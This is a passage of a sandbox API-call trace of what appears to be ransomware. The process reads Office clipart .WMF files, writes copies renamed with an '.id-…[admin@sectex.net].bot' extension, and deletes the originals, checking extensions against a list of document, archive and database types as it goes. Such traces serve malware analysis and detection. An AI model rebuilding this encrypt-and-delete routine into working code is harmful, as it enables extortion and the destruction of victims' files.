	[0144.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0144.996] GetLastError () returned 0x0
	[0144.996] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7e8, lpOverlapped=0x0) returned 1
	[0145.026] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x7f0, lpOverlapped=0x0) returned 1
	[0145.027] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.027] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.027] SetEndOfFile (hFile=0x38c) returned 1
	[0145.027] CloseHandle (hObject=0x38c) returned 1
	[0145.027] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.027] SetEndOfFile (hFile=0x3a4) returned 1
	[0145.029] CloseHandle (hObject=0x3a4) returned 1
	[0145.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.029] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf")) returned 1
	[0145.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.030] lstrlenW (lpString=".doc") returned 4
	[0145.030] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.030] lstrlenW (lpString=".docx") returned 5
	[0145.030] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.030] lstrlenW (lpString=".pdf") returned 4
	[0145.030] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.030] lstrlenW (lpString=".xls") returned 4
	[0145.030] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.030] lstrlenW (lpString=".xlsx") returned 5
	[0145.030] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.030] lstrlenW (lpString=".ppt") returned 4
	[0145.030] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.030] lstrlenW (lpString=".zip") returned 4
	[0145.030] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.030] lstrlenW (lpString=".rar") returned 4
	[0145.030] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.030] lstrlenW (lpString=".bz2") returned 4
	[0145.030] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.030] lstrlenW (lpString=".7z") returned 3
	[0145.031] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.031] lstrlenW (lpString=".dbf") returned 4
	[0145.031] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.031] lstrlenW (lpString=".1cd") returned 4
	[0145.031] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.031] lstrlenW (lpString=".jpg") returned 4
	[0145.031] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.031] lstrlenW (lpString=".doc") returned 4
	[0145.031] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.031] lstrlenW (lpString=".docx") returned 5
	[0145.031] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.031] lstrlenW (lpString=".pdf") returned 4
	[0145.031] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.031] lstrlenW (lpString=".xls") returned 4
	[0145.031] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.031] lstrlenW (lpString=".xlsx") returned 5
	[0145.031] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.031] lstrlenW (lpString=".ppt") returned 4
	[0145.031] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.031] lstrlenW (lpString=".zip") returned 4
	[0145.031] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.031] lstrlenW (lpString=".rar") returned 4
	[0145.031] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.031] lstrlenW (lpString=".bz2") returned 4
	[0145.031] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.031] lstrlenW (lpString=".7z") returned 3
	[0145.031] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.032] lstrlenW (lpString=".dbf") returned 4
	[0145.032] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.032] lstrlenW (lpString=".1cd") returned 4
	[0145.032] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63
	[0145.032] lstrlenW (lpString=".jpg") returned 4
	[0145.032] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.032] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.032] lstrlenW (lpString="DD01180_.WMF") returned 12
	[0145.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.032] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2084) returned 1
	[0145.032] CloseHandle (hObject=0x3a4) returned 1
	[0145.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf")) returned 0x20
	[0145.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.033] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.033] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.034] GetLastError () returned 0x0
	[0145.034] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x824, lpOverlapped=0x0) returned 1
	[0145.195] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x830, lpOverlapped=0x0) returned 1
	[0145.203] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.203] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.203] SetEndOfFile (hFile=0x38c) returned 1
	[0145.204] CloseHandle (hObject=0x38c) returned 1
	[0145.204] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.204] SetEndOfFile (hFile=0x3a4) returned 1
	[0145.206] CloseHandle (hObject=0x3a4) returned 1
	[0145.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.206] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf")) returned 1
	[0145.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.207] lstrlenW (lpString=".doc") returned 4
	[0145.207] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.207] lstrlenW (lpString=".docx") returned 5
	[0145.207] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.207] lstrlenW (lpString=".pdf") returned 4
	[0145.207] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.207] lstrlenW (lpString=".xls") returned 4
	[0145.207] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.207] lstrlenW (lpString=".xlsx") returned 5
	[0145.207] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.207] lstrlenW (lpString=".ppt") returned 4
	[0145.207] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.207] lstrlenW (lpString=".zip") returned 4
	[0145.207] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.207] lstrlenW (lpString=".rar") returned 4
	[0145.207] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.207] lstrlenW (lpString=".bz2") returned 4
	[0145.207] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.207] lstrlenW (lpString=".7z") returned 3
	[0145.207] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.207] lstrlenW (lpString=".dbf") returned 4
	[0145.207] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.207] lstrlenW (lpString=".1cd") returned 4
	[0145.207] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.207] lstrlenW (lpString=".jpg") returned 4
	[0145.207] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.208] lstrlenW (lpString=".doc") returned 4
	[0145.208] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.208] lstrlenW (lpString=".docx") returned 5
	[0145.208] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.208] lstrlenW (lpString=".pdf") returned 4
	[0145.208] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.208] lstrlenW (lpString=".xls") returned 4
	[0145.208] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.208] lstrlenW (lpString=".xlsx") returned 5
	[0145.208] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.208] lstrlenW (lpString=".ppt") returned 4
	[0145.208] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.208] lstrlenW (lpString=".zip") returned 4
	[0145.208] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.208] lstrlenW (lpString=".rar") returned 4
	[0145.208] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.208] lstrlenW (lpString=".bz2") returned 4
	[0145.208] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.208] lstrlenW (lpString=".7z") returned 3
	[0145.208] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.208] lstrlenW (lpString=".dbf") returned 4
	[0145.208] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.208] lstrlenW (lpString=".1cd") returned 4
	[0145.208] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63
	[0145.208] lstrlenW (lpString=".jpg") returned 4
	[0145.208] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.209] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.209] lstrlenW (lpString="DD01628_.WMF") returned 12
	[0145.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.209] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=19068) returned 1
	[0145.209] CloseHandle (hObject=0x3a4) returned 1
	[0145.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf")) returned 0x20
	[0145.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.210] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.210] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.210] GetLastError () returned 0x0
	[0145.210] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4a7c, lpOverlapped=0x0) returned 1
	[0145.212] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4a80, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4a80, lpOverlapped=0x0) returned 1
	[0145.214] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.214] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.214] SetEndOfFile (hFile=0x38c) returned 1
	[0145.214] CloseHandle (hObject=0x38c) returned 1
	[0145.214] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.214] SetEndOfFile (hFile=0x3a4) returned 1
	[0145.216] CloseHandle (hObject=0x3a4) returned 1
	[0145.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.217] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf")) returned 1
	[0145.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.217] lstrlenW (lpString=".doc") returned 4
	[0145.217] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.217] lstrlenW (lpString=".docx") returned 5
	[0145.217] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.217] lstrlenW (lpString=".pdf") returned 4
	[0145.217] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.217] lstrlenW (lpString=".xls") returned 4
	[0145.217] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.217] lstrlenW (lpString=".xlsx") returned 5
	[0145.217] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.217] lstrlenW (lpString=".ppt") returned 4
	[0145.217] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.217] lstrlenW (lpString=".zip") returned 4
	[0145.217] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.217] lstrlenW (lpString=".rar") returned 4
	[0145.218] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString=".bz2") returned 4
	[0145.218] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString=".7z") returned 3
	[0145.218] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.218] lstrlenW (lpString=".dbf") returned 4
	[0145.218] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.218] lstrlenW (lpString=".1cd") returned 4
	[0145.218] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.218] lstrlenW (lpString=".jpg") returned 4
	[0145.218] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.218] lstrlenW (lpString=".doc") returned 4
	[0145.218] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString=".docx") returned 5
	[0145.218] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.218] lstrlenW (lpString=".pdf") returned 4
	[0145.218] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString=".xls") returned 4
	[0145.218] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.218] lstrlenW (lpString=".xlsx") returned 5
	[0145.218] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.218] lstrlenW (lpString=".ppt") returned 4
	[0145.218] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.218] lstrlenW (lpString=".zip") returned 4
	[0145.218] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.218] lstrlenW (lpString=".rar") returned 4
	[0145.218] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.218] lstrlenW (lpString=".bz2") returned 4
	[0145.219] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.219] lstrlenW (lpString=".7z") returned 3
	[0145.219] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.219] lstrlenW (lpString=".dbf") returned 4
	[0145.219] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.219] lstrlenW (lpString=".1cd") returned 4
	[0145.219] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63
	[0145.219] lstrlenW (lpString=".jpg") returned 4
	[0145.219] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.219] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.219] lstrlenW (lpString="DD01629_.WMF") returned 12
	[0145.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.221] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=580) returned 1
	[0145.221] CloseHandle (hObject=0x3a4) returned 1
	[0145.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf")) returned 0x20
	[0145.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.222] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.222] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
